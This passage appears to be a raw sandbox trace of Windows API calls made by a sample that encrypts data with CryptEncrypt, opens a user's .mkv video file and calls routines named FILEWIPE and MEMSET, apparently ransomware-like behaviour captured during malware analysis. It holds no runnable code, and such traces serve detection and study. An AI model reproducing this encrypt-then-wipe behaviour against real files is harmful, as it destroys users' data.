lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0199.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.732] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0199.733] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.733] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.733] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0199.733] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.733] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.733] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.734] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x16b05, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x16b10) returned 1 [0199.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.734] CharLowerBuffW (in: lpsz="byte[92945]", cchLength=0xb | out: lpsz="byte[92945]") returned 0xb [0199.734] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.758] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.760] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8c628*, pdwDataLen=0x87e820*=0x16b05, dwBufLen=0x16b10 | out: pbData=0xa8c628*, pdwDataLen=0x87e820*=0x16b10) returned 1 [0199.761] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.761] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.761] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.764] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.764] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.764] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.764] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.764] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.764] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.765] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.765] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.765] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.778] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.779] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.779] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0199.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.779] CryptDestroyKey (hKey=0x90af18) returned 1 [0199.779] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.779] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.779] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.779] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.779] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.780] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0199.780] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.780] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0199.780] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.780] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.780] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.780] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.780] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.780] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.780] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.780] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.780] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.781] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.781] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.781] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.781] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.781] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0199.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.781] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.781] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0199.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.783] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.784] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.784] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0199.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0xaa5959f0, ftLastWriteTime.dwHighDateTime=0x1d5e504, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 0x90ae18 [0199.784] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0199.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.785] CharLowerBuffW (in: lpsz="byte[92933]", cchLength=0xb | out: lpsz="byte[92933]") returned 0xb [0199.785] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.785] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.785] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.785] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.785] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.785] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.785] HeapFree (in: 